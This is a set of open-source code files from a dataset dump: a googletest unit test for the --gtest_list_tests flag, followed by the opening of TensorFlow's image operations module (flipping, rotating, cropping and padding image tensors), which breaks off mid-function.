other_flag: a different flag to be passed to command
along with gtest_list_tests;
None if the flag should not be present.
"""
if flag_value is None:
flag = ''
flag_expression = 'not set'
elif flag_value == '0':
flag = '--%s=0' % LIST_TESTS_FLAG
flag_expression = '0'
else:
flag = '--%s' % LIST_TESTS_FLAG
flag_expression = '1'
args = [flag]
if other_flag is not None:
args += [other_flag]
output = Run(args)
if expected_output_re:
self.assert_(
expected_output_re.match(output),
('when %s is %s, the output of "%s" is "%s",\n'
'which does not match regex "%s"' %
(LIST_TESTS_FLAG, flag_expression, ' '.join(args), output,
expected_output_re.pattern)))
else:
self.assert_(
not EXPECTED_OUTPUT_NO_FILTER_RE.match(output),
('when %s is %s, the output of "%s" is "%s"'%
(LIST_TESTS_FLAG, flag_expression, ' '.join(args), output)))
def testDefaultBehavior(self):
"""Tests the behavior of the default mode."""
self.RunAndVerify(flag_value=None,
expected_output_re=None,
other_flag=None)
def testFlag(self):
"""Tests using the --gtest_list_tests flag."""
self.RunAndVerify(flag_value='0',
expected_output_re=None,
other_flag=None)
self.RunAndVerify(flag_value='1',
expected_output_re=EXPECTED_OUTPUT_NO_FILTER_RE,
other_flag=None)
def testOverrideNonFilterFlags(self):
"""Tests that --gtest_list_tests overrides the non-filter flags."""
self.RunAndVerify(flag_value='1',
expected_output_re=EXPECTED_OUTPUT_NO_FILTER_RE,
other_flag='--gtest_break_on_failure')
def testWithFilterFlags(self):
"""Tests that --gtest_list_tests takes into account the
--gtest_filter flag."""
self.RunAndVerify(flag_value='1',
expected_output_re=EXPECTED_OUTPUT_FILTER_FOO_RE,
other_flag='--gtest_filter=Foo*')
if __name__ == '__main__':
gtest_test_utils.Main()
|
Dragnalith/googletest
|
refs/heads/master
|
test/gtest_list_tests_unittest.py
|
1898
|
#!/usr/bin/env python
#
# Copyright 2006, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Unit test for Google Test's --gtest_list_tests flag.
A user can ask Google Test to list all tests by specifying the
--gtest_list_tests flag. This script tests such functionality
by invoking gtest_list_tests_unittest_ (a program written with
Google Test) the command line flags.
"""
__author__ = 'phanna@google.com (Patrick Hanna)'
import gtest_test_utils
import re
# Constants.
# The command line flag for enabling/disabling listing all tests.
LIST_TESTS_FLAG = 'gtest_list_tests'
# Path to the gtest_list_tests_unittest_ program.
EXE_PATH = gtest_test_utils.GetTestExecutablePath('gtest_list_tests_unittest_')
# The expected output when running gtest_list_tests_unittest_ with
# --gtest_list_tests
EXPECTED_OUTPUT_NO_FILTER_RE = re.compile(r"""FooDeathTest\.
Test1
Foo\.
Bar1
Bar2
DISABLED_Bar3
Abc\.
Xyz
Def
FooBar\.
Baz
FooTest\.
Test1
DISABLED_Test2
Test3
TypedTest/0\. # TypeParam = (VeryLo{245}|class VeryLo{239})\.\.\.
TestA
TestB
TypedTest/1\. # TypeParam = int\s*\*
TestA
TestB
TypedTest/2\. # TypeParam = .*MyArray<bool,\s*42>
TestA
TestB
My/TypeParamTest/0\. # TypeParam = (VeryLo{245}|class VeryLo{239})\.\.\.
TestA
TestB
My/TypeParamTest/1\. # TypeParam = int\s*\*
TestA
TestB
My/TypeParamTest/2\. # TypeParam = .*MyArray<bool,\s*42>
TestA
TestB
MyInstantiation/ValueParamTest\.
TestA/0 # GetParam\(\) = one line
TestA/1 # GetParam\(\) = two\\nlines
TestA/2 # GetParam\(\) = a very\\nlo{241}\.\.\.
TestB/0 # GetParam\(\) = one line
TestB/1 # GetParam\(\) = two\\nlines
TestB/2 # GetParam\(\) = a very\\nlo{241}\.\.\.
""")
# The expected output when running gtest_list_tests_unittest_ with
# --gtest_list_tests and --gtest_filter=Foo*.
EXPECTED_OUTPUT_FILTER_FOO_RE = re.compile(r"""FooDeathTest\.
Test1
Foo\.
Bar1
Bar2
DISABLED_Bar3
FooBar\.
Baz
FooTest\.
Test1
DISABLED_Test2
Test3
""")
# Utilities.
def Run(args):
"""Runs gtest_list_tests_unittest_ and returns the list of tests printed."""
return gtest_test_utils.Subprocess([EXE_PATH] + args,
capture_stderr=False).output
# The unit test.
class GTestListTestsUnitTest(gtest_test_utils.TestCase):
"""Tests using the --gtest_list_tests flag to list all tests."""
def RunAndVerify(self, flag_value, expected_output_re, other_flag):
"""Runs gtest_list_tests_unittest_ and verifies that it prints
the correct tests.
Args:
flag_value: value of the --gtest_list_tests flag;
None if the flag should not be present.
expected_output_re: regular expression that matches the expected
output after running command;
other_flag: a different flag to be passed to command
along with gtest_list_tests;
None if the flag should not be present.
"""
if flag_value is None:
flag = ''
flag_expression = 'not set'
elif flag_value == '0':
flag = '--%s=0' % LIST_TESTS_FLAG
flag_expression = '0'
else:
flag = '--%s' % LIST_TESTS_FLAG
flag_expression = '1'
args = [flag]
if other_flag is not None:
args += [other_flag]
output = Run(args)
if expected_output_re:
self.assert_(
expected_output_re.match(output),
('when %s is %s, the output of "%s" is "%s",\n'
'which does not match regex "%s"' %
(LIST_TESTS_FLAG, flag_expression, ' '.join(args), output,
expected_output_re.pattern)))
else:
self.assert_(
not EXPECTED_OUTPUT_NO_FILTER_RE.match(output),
('when %s is %s, the output of "%s" is "%s"'%
(LIST_TESTS_FLAG, flag_expression, ' '.join(args), output)))
def testDefaultBehavior(self):
"""Tests the behavior of the default mode."""
self.RunAndVerify(flag_value=None,
expected_output_re=None,
other_flag=None)
def testFlag(self):
"""Tests using the --gtest_list_tests flag."""
self.RunAndVerify(flag_value='0',
expected_output_re=None,
other_flag=None)
self.RunAndVerify(flag_value='1',
expected_output_re=EXPECTED_OUTPUT_NO_FILTER_RE,
other_flag=None)
def testOverrideNonFilterFlags(self):
"""Tests that --gtest_list_tests overrides the non-filter flags."""
self.RunAndVerify(flag_value='1',
expected_output_re=EXPECTED_OUTPUT_NO_FILTER_RE,
other_flag='--gtest_break_on_failure')
def testWithFilterFlags(self):
"""Tests that --gtest_list_tests takes into account the
--gtest_filter flag."""
self.RunAndVerify(flag_value='1',
expected_output_re=EXPECTED_OUTPUT_FILTER_FOO_RE,
other_flag='--gtest_filter=Foo*')
if __name__ == '__main__':
gtest_test_utils.Main()
|
gautam1858/tensorflow
|
refs/heads/master
|
tensorflow/python/ops/image_ops_impl.py
|
2
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Implementation of image ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.compat import compat
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import gen_image_ops
from tensorflow.python.ops import gen_nn_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import string_ops
from tensorflow.python.ops import variables
from tensorflow.python.util import deprecation
from tensorflow.python.util.tf_export import tf_export
ops.NotDifferentiable('RandomCrop')
# TODO(b/31222613): This op may be differentiable, and there may be
# latent bugs here.
ops.NotDifferentiable('RGBToHSV')
# TODO(b/31222613): This op may be differentiable, and there may be
# latent bugs here.
ops.NotDifferentiable('HSVToRGB')
ops.NotDifferentiable('DrawBoundingBoxes')
ops.NotDifferentiable('SampleDistortedBoundingBox')
ops.NotDifferentiable('SampleDistortedBoundingBoxV2')
# TODO(bsteiner): Implement the gradient function for extract_glimpse
# TODO(b/31222613): This op may be differentiable, and there may be
# latent bugs here.
ops.NotDifferentiable('ExtractGlimpse')
ops.NotDifferentiable('NonMaxSuppression')
ops.NotDifferentiable('NonMaxSuppressionV2')
ops.NotDifferentiable('NonMaxSuppressionWithOverlaps')
# pylint: disable=invalid-name
def _assert(cond, ex_type, msg):
"""A polymorphic assert, works with tensors and boolean expressions.
If `cond` is not a tensor, behave like an ordinary assert statement, except
that a empty list is returned. If `cond` is a tensor, return a list
containing a single TensorFlow assert op.
Args:
cond: Something evaluates to a boolean value. May be a tensor.
ex_type: The exception class to use.
msg: The error message.
Returns:
A list, containing at most one assert op.
"""
if _is_tensor(cond):
return [control_flow_ops.Assert(cond, [msg])]
else:
if not cond:
raise ex_type(msg)
else:
return []
def _is_tensor(x):
"""Returns `True` if `x` is a symbolic tensor-like object.
Args:
x: A python object to check.
Returns:
`True` if `x` is a `tf.Tensor` or `tf.Variable`, otherwise `False`.
"""
return isinstance(x, (ops.Tensor, variables.Variable))
def _ImageDimensions(image, rank):
"""Returns the dimensions of an image tensor.
Args:
image: A rank-D Tensor. For 3-D of shape: `[height, width, channels]`.
rank: The expected rank of the image
Returns:
A list of corresponding to the dimensions of the
input image. Dimensions that are statically known are python integers,
otherwise they are integer scalar tensors.
"""
if image.get_shape().is_fully_defined():
return image.get_shape().as_list()
else:
static_shape = image.get_shape().with_rank(rank).as_list()
dynamic_shape = array_ops.unstack(array_ops.shape(image), rank)
return [
s if s is not None else d for s, d in zip(static_shape, dynamic_shape)
]
def _Check3DImage(image, require_static=True):
"""Assert that we are working with properly shaped image.
Args:
image: 3-D Tensor of shape [height, width, channels]
require_static: If `True`, requires that all dimensions of `image` are
known and non-zero.
Raises:
ValueError: if `image.shape` is not a 3-vector.
Returns:
An empty list, if `image` has fully defined dimensions. Otherwise, a list
containing an assert op is returned.
"""
try:
image_shape = image.get_shape().with_rank(3)
except ValueError:
raise ValueError(
"'image' (shape %s) must be three-dimensional." % image.shape)
if require_static and not image_shape.is_fully_defined():
raise ValueError("'image' (shape %s) must be fully defined." % image_shape)
if any(x == 0 for x in image_shape):
raise ValueError("all dims of 'image.shape' must be > 0: %s" % image_shape)
if not image_shape.is_fully_defined():
return [
check_ops.assert_positive(
array_ops.shape(image),
["all dims of 'image.shape' "
'must be > 0.'])
]
else:
return []
def _Assert3DImage(image):
"""Assert that we are working with a properly shaped image.
Performs the check statically if possible (i.e. if the shape
is statically known). Otherwise adds a control dependency
to an assert op that checks the dynamic shape.
Args:
image: 3-D Tensor of shape [height, width, channels]
Raises:
ValueError: if `image.shape` is not a 3-vector.
Returns:
If the shape of `image` could be verified statically, `image` is
returned unchanged, otherwise there will be a control dependency
added that asserts the correct dynamic shape.
"""
return control_flow_ops.with_dependencies(
_Check3DImage(image, require_static=False), image)
def _AssertAtLeast3DImage(image):
"""Assert that we are working with a properly shaped image.
Performs the check statically if possible (i.e. if the shape
is statically known). Otherwise adds a control dependency
to an assert op that checks the dynamic shape.
Args:
image: >= 3-D Tensor of size [*, height, width, depth]
Raises:
ValueError: if image.shape is not a [>= 3] vector.
Returns:
If the shape of `image` could be verified statically, `image` is
returned unchanged, otherwise there will be a control dependency
added that asserts the correct dynamic shape.
"""
return control_flow_ops.with_dependencies(
_CheckAtLeast3DImage(image, require_static=False), image)
def _CheckAtLeast3DImage(image, require_static=True):
"""Assert that we are working with properly shaped image.
Args:
image: >= 3-D Tensor of size [*, height, width, depth]
require_static: If `True`, requires that all dimensions of `image` are
known and non-zero.
Raises:
ValueError: if image.shape is not a [>= 3] vector.
Returns:
An empty list, if `image` has fully defined dimensions. Otherwise, a list
containing an assert op is returned.
"""
try:
if image.get_shape().ndims is None:
image_shape = image.get_shape().with_rank(3)
else:
image_shape = image.get_shape().with_rank_at_least(3)
except ValueError:
raise ValueError("'image' must be at least three-dimensional.")
if require_static and not image_shape.is_fully_defined():
raise ValueError('\'image\' must be fully defined.')
if any(x == 0 for x in image_shape):
raise ValueError(
'all dims of \'image.shape\' must be > 0: %s' % image_shape)
if not image_shape.is_fully_defined():
return [
check_ops.assert_positive(
array_ops.shape(image),
["all dims of 'image.shape' "
'must be > 0.'])
]
else:
return []
def fix_image_flip_shape(image, result):
"""Set the shape to 3 dimensional if we don't know anything else.
Args:
image: original image size
result: flipped or transformed image
Returns:
An image whose shape is at least None,None,None.
"""
image_shape = image.get_shape()
if image_shape == tensor_shape.unknown_shape():
result.set_shape([None, None, None])
else:
result.set_shape(image_shape)
return result
@tf_export('image.random_flip_up_down')
def random_flip_up_down(image, seed=None):
"""Randomly flips an image vertically (upside down).
With a 1 in 2 chance, outputs the contents of `image` flipped along the first
dimension, which is `height`. Otherwise output the image as-is.
Args:
image: 4-D Tensor of shape `[batch, height, width, channels]` or
3-D Tensor of shape `[height, width, channels]`.
seed: A Python integer. Used to create a random seed. See
`tf.set_random_seed`
for behavior.
Returns:
A tensor of the same type and shape as `image`.
Raises:
ValueError: if the shape of `image` not supported.
"""
return _random_flip(image, 0, seed, 'random_flip_up_down')
@tf_export('image.random_flip_left_right')
def random_flip_left_right(image, seed=None):
"""Randomly flip an image horizontally (left to right).
With a 1 in 2 chance, outputs the contents of `image` flipped along the
second dimension, which is `width`. Otherwise output the image as-is.
Args:
image: 4-D Tensor of shape `[batch, height, width, channels]` or
3-D Tensor of shape `[height, width, channels]`.
seed: A Python integer. Used to create a random seed. See
`tf.set_random_seed`
for behavior.
Returns:
A tensor of the same type and shape as `image`.
Raises:
ValueError: if the shape of `image` not supported.
"""
return _random_flip(image, 1, seed, 'random_flip_left_right')
def _random_flip(image, flip_index, seed, scope_name):
"""Randomly (50% chance) flip an image along axis `flip_index`.
Args:
image: 4-D Tensor of shape `[batch, height, width, channels]` or
3-D Tensor of shape `[height, width, channels]`.
flip_index: Dimension along which to flip image. Vertical: 0, Horizontal: 1
seed: A Python integer. Used to create a random seed. See
`tf.set_random_seed`
for behavior.
scope_name: Name of the scope in which the ops are added.
Returns:
A tensor of the same type and shape as `image`.
Raises:
ValueError: if the shape of `image` not supported.
"""
with ops.name_scope(None, scope_name, [image]) as scope:
image = ops.convert_to_tensor(image, name='image')
image = _AssertAtLeast3DImage(image)
shape = image.get_shape()
if shape.ndims == 3 or shape.ndims is None:
uniform_random = random_ops.random_uniform([], 0, 1.0, seed=seed)
mirror_cond = math_ops.less(uniform_random, .5)
result = control_flow_ops.cond(
mirror_cond,
lambda: array_ops.reverse(image, [flip_index]),
lambda: image,
name=scope
)
return fix_image_flip_shape(image, result)
elif shape.ndims == 4:
batch_size = array_ops.shape(image)[0]
uniform_random = random_ops.random_uniform(
[batch_size], 0, 1.0, seed=seed
)
flips = math_ops.round(
array_ops.reshape(uniform_random, [batch_size, 1, 1, 1])
)
flips = math_ops.cast(flips, image.dtype)
flipped_input = array_ops.reverse(image, [flip_index + 1])
return flips * flipped_input + (1 - flips) * image
else:
raise ValueError('\'image\' must have either 3 or 4 dimensions.')
@tf_export('image.flip_left_right')
def flip_left_right(image):
"""Flip an image horizontally (left to right).
Outputs the contents of `image` flipped along the width dimension.
See also `reverse()`.
Args:
image: 4-D Tensor of shape `[batch, height, width, channels]` or
3-D Tensor of shape `[height, width, channels]`.
Returns:
A tensor of the same type and shape as `image`.
Raises:
ValueError: if the shape of `image` not supported.
"""
return _flip(image, 1, 'flip_left_right')
@tf_export('image.flip_up_down')
def flip_up_down(image):
"""Flip an image vertically (upside down).
Outputs the contents of `image` flipped along the height dimension.
See also `reverse()`.
Args:
image: 4-D Tensor of shape `[batch, height, width, channels]` or
3-D Tensor of shape `[height, width, channels]`.
Returns:
A tensor of the same type and shape as `image`.
Raises:
ValueError: if the shape of `image` not supported.
"""
return _flip(image, 0, 'flip_up_down')
def _flip(image, flip_index, scope_name):
"""Flip an image either horizontally or vertically.
Outputs the contents of `image` flipped along the dimension `flip_index`.
See also `reverse()`.
Args:
image: 4-D Tensor of shape `[batch, height, width, channels]` or
3-D Tensor of shape `[height, width, channels]`.
flip_index: 0 For vertical, 1 for horizontal.
Returns:
A tensor of the same type and shape as `image`.
Raises:
ValueError: if the shape of `image` not supported.
"""
with ops.name_scope(None, scope_name, [image]):
image = ops.convert_to_tensor(image, name='image')
image = _AssertAtLeast3DImage(image)
shape = image.get_shape()
if shape.ndims == 3 or shape.ndims is None:
return fix_image_flip_shape(image, array_ops.reverse(image, [flip_index]))
elif shape.ndims == 4:
return array_ops.reverse(image, [flip_index+1])
else:
raise ValueError('\'image\' must have either 3 or 4 dimensions.')
@tf_export('image.rot90')
def rot90(image, k=1, name=None):
"""Rotate image(s) counter-clockwise by 90 degrees.
Args:
image: 4-D Tensor of shape `[batch, height, width, channels]` or
3-D Tensor of shape `[height, width, channels]`.
k: A scalar integer. The number of times the image is rotated by 90 degrees.
name: A name for this operation (optional).
Returns:
A rotated tensor of the same type and shape as `image`.
Raises:
ValueError: if the shape of `image` not supported.
"""
with ops.name_scope(name, 'rot90', [image, k]) as scope:
image = ops.convert_to_tensor(image, name='image')
image = _AssertAtLeast3DImage(image)
k = ops.convert_to_tensor(k, dtype=dtypes.int32, name='k')
k.get_shape().assert_has_rank(0)
k = math_ops.mod(k, 4)
shape = image.get_shape()
if shape.ndims == 3 or shape.ndims is None:
return _rot90_3D(image, k, scope)
elif shape.ndims == 4:
return _rot90_4D(image, k, scope)
else:
raise ValueError('\'image\' must have either 3 or 4 dimensions.')
def _rot90_3D(image, k, name_scope):
"""Rotate image counter-clockwise by 90 degrees `k` times.
Args:
image: 3-D Tensor of shape `[height, width, channels]`.
k: A scalar integer. The number of times the image is rotated by 90 degrees.
name_scope: A valid TensorFlow name scope.
Returns:
A 3-D tensor of the same type and shape as `image`.
"""
def _rot90():
return array_ops.transpose(array_ops.reverse_v2(image, [1]), [1, 0, 2])
def _rot180():
return array_ops.reverse_v2(image, [0, 1])
def _rot270():
return array_ops.reverse_v2(array_ops.transpose(image, [1, 0, 2]), [1])
cases = [(math_ops.equal(k, 1), _rot90), (math_ops.equal(k, 2), _rot180),
(math_ops.equal(k, 3), _rot270)]
result = control_flow_ops.case(
cases, default=lambda: image, exclusive=True, name=name_scope)
result.set_shape([None, None, image.get_shape()[2]])
return result
def _rot90_4D(images, k, name_scope):
"""Rotate batch of images counter-clockwise by 90 degrees `k` times.
Args:
images: 4-D Tensor of shape `[height, width, channels]`.
k: A scalar integer. The number of times the images are rotated by 90
degrees.
name_scope: A valid TensorFlow name scope.
Returns:
A 4-D tensor of the same type and shape as `images`.
"""
def _rot90():
return array_ops.transpose(array_ops.reverse_v2(images, [2]), [0, 2, 1, 3])
def _rot180():
return array_ops.reverse_v2(images, [1, 2])
def _rot270():
return array_ops.reverse_v2(array_ops.transpose(images, [0, 2, 1, 3]), [2])
cases = [(math_ops.equal(k, 1), _rot90), (math_ops.equal(k, 2), _rot180),
(math_ops.equal(k, 3), _rot270)]
result = control_flow_ops.case(
cases, default=lambda: images, exclusive=True, name=name_scope)
shape = result.get_shape()
result.set_shape([shape[0], None, None, shape[3]])
return result
@tf_export(v1=['image.transpose', 'image.transpose_image'])
def transpose_image(image):
return transpose(image=image, name=None)
@tf_export('image.transpose', v1=[])
def transpose(image, name=None):
"""Transpose image(s) by swapping the height and width dimension.
Args:
image: 4-D Tensor of shape `[batch, height, width, channels]` or
3-D Tensor of shape `[height, width, channels]`.
name: A name for this operation (optional).
Returns:
If `image` was 4-D, a 4-D float Tensor of shape
`[batch, width, height, channels]`
If `image` was 3-D, a 3-D float Tensor of shape
`[width, height, channels]`
Raises:
ValueError: if the shape of `image` not supported.
"""
with ops.name_scope(name, 'transpose', [image]):
image = ops.convert_to_tensor(image, name='image')
image = _AssertAtLeast3DImage(image)
shape = image.get_shape()
if shape.ndims == 3 or shape.ndims is None:
return array_ops.transpose(image, [1, 0, 2], name=name)
elif shape.ndims == 4:
return array_ops.transpose(image, [0, 2, 1, 3], name=name)
else:
raise ValueError('\'image\' must have either 3 or 4 dimensions.')
@tf_export('image.central_crop')
def central_crop(image, central_fraction):
"""Crop the central region of the image(s).
Remove the outer parts of an image but retain the central region of the image
along each dimension. If we specify central_fraction = 0.5, this function
returns the region marked with "X" in the below diagram.
--------
| |
| XXXX |
| XXXX |
| | where "X" is the central 50% of the image.
--------
This function works on either a single image (`image` is a 3-D Tensor), or a
batch of images (`image` is a 4-D Tensor).
Args:
image: Either a 3-D float Tensor of shape [height, width, depth], or a 4-D
Tensor of shape [batch_size, height, width, depth].
central_fraction: float (0, 1], fraction of size to crop
Raises:
ValueError: if central_crop_fraction is not within (0, 1].
Returns:
3-D / 4-D float Tensor, as per the input.
"""
with ops.name_scope(None, 'central_crop', [image]):
image = ops.convert_to_tensor(image, name='image')
if central_fraction <= 0.0 or central_fraction > 1.0:
raise ValueError('central_fraction must be within (0, 1]')
if central_fraction == 1.0:
return image
_AssertAtLeast3DImage(image)
rank = image.get_shape().ndims
if rank != 3 and rank != 4:
raise ValueError('`image` should either be a Tensor with rank = 3 or '
'rank = 4. Had rank = {}.'.format(rank))
# Helper method to return the `idx`-th dimension of `tensor`, along with
# a boolean signifying if the dimension is dynamic.
def _get_dim(tensor, idx):
static_shape = tensor.get_shape().dims[idx].value
if static_shape is not None:
return static_shape, False
return array_ops.shape(tensor)[idx], True
# Get the height, width, depth (and batch size, if the image is a 4-D
# tensor).
if rank == 3:
img_h, dynamic_h = _get_dim(image, 0)
img_w, dynamic_w = _get_dim(image, 1)
img_d = image.get_shape()[2]
else:
img_bs = image.get_shape()[0]
img_h, dynamic_h = _get_dim(image, 1)
img_w, dynamic_w = _get_dim(image, 2)
img_d = image.get_shape()[3]
# Compute the bounding boxes for the crop. The type and value of the
# bounding boxes depend on the `image` tensor's rank and whether / not the
# dimensions are statically defined.
if dynamic_h:
img_hd = math_ops.to_double(img_h)
bbox_h_start = math_ops.to_int32((img_hd - img_hd * central_fraction) / 2)
else:
img_hd = float(img_h)
bbox_h_start = int((img_hd - img_hd * central_fraction) / 2)
if dynamic_w:
img_wd = math_ops.to_double(img_w)
bbox_w_start = math_ops.to_int32((img_wd - img_wd * central_fraction) / 2)
else:
img_wd = float(img_w)
bbox_w_start = int((img_wd - img_wd * central_fraction) / 2)
bbox_h_size = img_h - bbox_h_start * 2
bbox_w_size = img_w - bbox_w_start * 2
if rank == 3:
bbox_begin = array_ops.stack([bbox_h_start, bbox_w_start, 0])
bbox_size = array_ops.stack([bbox_h_size, bbox_w_size, -1])
else:
bbox_begin = array_ops.stack([0, bbox_h_start, bbox_w_start, 0])
bbox_size = array_ops.stack([-1, bbox_h_size, bbox_w_size, -1])
image = array_ops.slice(image, bbox_begin, bbox_size)
# Reshape the `image` tensor to the desired size.
if rank == 3:
image.set_shape([
None if dynamic_h else bbox_h_size,
None if dynamic_w else bbox_w_size,
img_d
])
else:
image.set_shape([
img_bs,
None if dynamic_h else bbox_h_size,
None if dynamic_w else bbox_w_size,
img_d
])
return image
@tf_export('image.pad_to_bounding_box')
def pad_to_bounding_box(image, offset_height, offset_width, target_height,
target_width):
"""Pad `image` with zeros to the specified `height` and `width`.
Adds `offset_height` rows of zeros on top, `offset_width` columns of
zeros on the left, and then pads the image on the bottom and right
with zeros until it has dimensions `target_height`, `target_width`.
This op does nothing if `offset_*` is zero and the image already has size
`target_height` by `target_width`.
Args:
image: 4-D Tensor of shape `[batch, height, width, channels]` or
3-D Tensor of shape `[height, width, channels]`.
offset_height: Number of rows of zeros to add on top.
offset_width: Number of columns of zeros to add on the left.
target_height: Height of output image.
target_width: Width of output image.
Returns:
If `image` was 4-D, a 4-D float Tensor of shape
`[batch, target_height, target_width, channels]`
If `image` was 3-D, a 3-D float Tensor of shape
`[target_height, target_width, channels]`
Raises:
ValueError: If the shape of `image` is incompatible with the `offset_*` or
`target_*` arguments, or either `offset_height` or `offset_width` is
negative.
"""
with ops.name_scope(None, 'pad_to_bounding_box', [image]):
image = ops.convert_to_tensor(image, name='image')
is_batch = True
image_shape = image.get_shape()
if image_shape.ndims == 3:
is_batch = False
image = array_ops.expand_dims(image, 0)
elif image_shape.ndims is None:
is_batch = False
image = array_ops.expand_dims(image, 0)
image.set_shape([None] * 4)
elif image_shape.ndims != 4:
raise ValueError('\'image\' must have either 3 or 4 dimensions.')
assert_ops = _CheckAtLeast3DImage(image, require_static=False)
batch, height, width, depth = _ImageDimensions(image, rank=4)
after_padding_width = target_width - offset_width - width
after_padding_height = target_height - offset_height - height
assert_ops += _assert(offset_height >= 0, ValueError,
'offset_height must be >= 0')
assert_ops += _assert(offset_width >= 0, ValueError,
'offset_width must be >= 0')
assert_ops += _assert(after_padding_width >= 0, ValueError,
'width must be <= target - offset')
assert_ops += _assert(after_padding_height >= 0, ValueError,
'height must be <= target - offset')
image = control_flow_ops.with_dependencies(assert_ops, image)
# Do not pad on the depth dimensions.
paddings = array_ops.reshape(
array_ops.stack([
0, 0, offset_height, after_padding_height, offset_width,
after_padding_width, 0, 0
]), [4, 2])
padded = array_ops.pad(image, paddings)
padded_shape = [
None if _is_tensor(i) else i
for i in [batch, target_height, target_width, depth]
]
padded.set_shape(padded_shape)
if not is_batch:
padded = array_ops.squeeze(padded, axis=[0])
return padded
@tf_export('image.crop_to_bounding_box')
def crop_to_bounding_box(image, offset_height, offset_width, target_height,
target_width):
"""Crops an image to a specified bounding box.
This op cuts a rectangular part out of `image`. The top-left corner of the
returned image is at `offset_height, offset_width` in `image`, and its
lower-right corner is at
`offset_height + target_height, offset_width + target_width`.
Args:
image: 4-D Tensor of shape `[batch, height, width, channels]` or
3-D Tensor of shape `[height, width, channels]`.
offset_height: Vertical coordinate of the top-left corner of the result in
the input.
offset_width: Horizontal coordinate of the top-left corner of the result in
the input.
target_height: Height of the result.
target_width: Width of the result.
Returns:
If `image` was 4-D, a 4-D float Tensor of shape
`[batch, target_height, target_width, channels]`
If `image` was 3-D, a 3-D float Tensor of shape
`[target_height, target_width, channels]`
Raises:
ValueError: If the shape of `image` is incompatible with the `offset_*` or
`target_*` arguments, or either `offset_height` or `offset_width` is
negative, or either `target_height` or `target_width` is not positive.
"""
with ops.name_scope(None, 'crop_to_bounding_box', [image]):
image = ops.convert_to_tensor(image, name='image')
is_batch = True
image_shape = image.get_shape()
if image_shape.ndims == 3:
is_batch = False
image = array_ops.expand_dims(image, 0)
elif image_shape.ndims is None:
is_batch = False
image = array_ops.expand_dims(image, 0)
image.set_shape([None] * 4)
elif image_shape.ndims != 4:
raise ValueError('\'image\' must have either 3 or 4 dimensions.')
assert_ops = _CheckAtLeast3DImage(image, require_static=False)
batch, height, width, depth = _ImageDimensions(image, rank=4)
assert_ops += _assert(offset_width >= 0, ValueError,
'offset_width must be >= 0.')
assert_ops += _assert(offset_height >= 0, ValueError,
'offset_height must be >= 0.')
assert_ops += _assert(target_width > 0, ValueError,
'target_width must be > 0.')
assert_ops += _assert(target_height > 0, ValueError,
'target_height must be > 0.')
assert_ops += _assert(width >= (target_width + offset_width), ValueError,
'width must be >= target + offset.')
assert_ops += _assert(height >= (target_height + offset_height), ValueError,
'height must be >= target + offset.')
image = control_flow_ops.with_dependencies(assert_ops, image)
cropped = array_ops.slice(
image, array_ops.stack([0, offset_height, offset_width, 0]),
array_ops.stack([-1, target_height, target_width, -1]))
cropped_shape = [
None if _is_tensor(i) else i
for i in [batch, target_height, target_width, depth]
]
cropped.set_shape(cropped_shape)
if not is_batch:
cropped = array_ops.squeeze(cropped, axis=[0])
return cropped
@tf_export('image.resize_image_with_crop_or_pad')
def resize_image_with_crop_or_pad(image, target_height, target_width):
"""Crops and/or pads an image to a target width and height.
Resizes an image to a target width and height by either centrally
cropping the image or padding it evenly with zeros.
If `width` or `height` is greater than the specified `target_width` or
`target_height` respectively, this op centrally crops along that dimension.
If `width` or `height` is smaller than the specified `target_width` or
`target_height` respectively, this op centrally pads with 0 along that
dimension.
Args:
image: 4-D Tensor of shape `[batch, height, width, channels]` or
3-D Tensor of shape `[height, width, channels]`.
target_height: Target height.
target_width: Target width.
Raises:
ValueError: if `target_height` or `target_width` are zero or negative.
Returns:
Cropped and/or padded image.
If `images` was 4-D, a 4-D float Tensor of shape
`[batch, new_height, new_width, channels]`.
If `images` was 3-D, a 3-D float Tensor of shape
`[new_height, new_width, channels]`.
"""
with ops.name_scope(None, 'resize_image_with_crop_or_pad', [image]):
image = ops.convert_to_tensor(image, name='image')
image_shape = image.get_shape()
